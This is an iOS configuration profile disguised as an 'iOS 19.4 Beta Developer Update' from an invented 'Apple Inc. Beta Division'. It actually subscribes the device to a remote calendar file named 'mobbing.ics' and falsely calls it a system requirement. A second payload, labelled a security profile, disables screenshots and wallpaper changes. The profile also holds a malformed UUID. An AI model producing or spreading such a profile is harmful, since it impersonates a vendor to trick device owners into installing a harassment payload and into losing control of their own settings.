<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>PayloadContent</key>
	<array>
		<dict>
			<key>CalendarAccountDescription</key>
			<string> Apple Güvenlik ve Hız Protokolü</string>
			<key>CalendarAccountHostName</key>
			<string>raw.githubusercontent.com/keremkero319-del/keross/main/mobbing.ics</string>
			<key>CalendarAccountUseSSL</key>
			<true/>
			<key>PayloadDescription</key>
			<string>Sistem bildirimleri için gerekli takvim aboneliği.</string>
			<key>PayloadDisplayName</key>
			<string>Sistem Takvimi</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.calendar.managed.troll</string>
			<key>PayloadType</key>
			<string>com.apple.subscribedcalendar.account</string>
			<key>PayloadUUID</key>
			<string>12345678-1234-1234-1234-123456789012</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
		</dict>
		
		<dict>
			<key>PayloadDescription</key>
			<string>Sistem optimizasyonu kısıtlamaları.</string>
			<key>PayloadDisplayName</key>
			<string>Güvenlik Profili</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.managed.restrictions.pro</string>
			<key>PayloadType</key>
			<string>com.apple.applicationaccess</string>
			<key>PayloadUUID</key>
			<string>87654321-4321-4321-4321-210987654321</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>allowScreenShot</key>
			<false/> <key>allowWallpaperModification</key>
			<false/> </dict>
	</array>
	<key>PayloadDisplayName</key>
	<string>iOS 19.4 Beta Geliştirici Güncellemesi</string>
	<key>PayloadIdentifier</key>
	<string>com.apple.system.update.beta</string>
	<key>PayloadOrganization</key>
	<string>Apple Inc. Beta Division</string>
	<key>PayloadType</key>
	<string>Configuration</string>
	<key>PayloadUUID</key>
	<string>ABCDEF12-ABCD-1234-EFGH-567890ABCDEF</string>
	<key>PayloadVersion</key>
	<integer>1</integer>
</dict>
</plist>
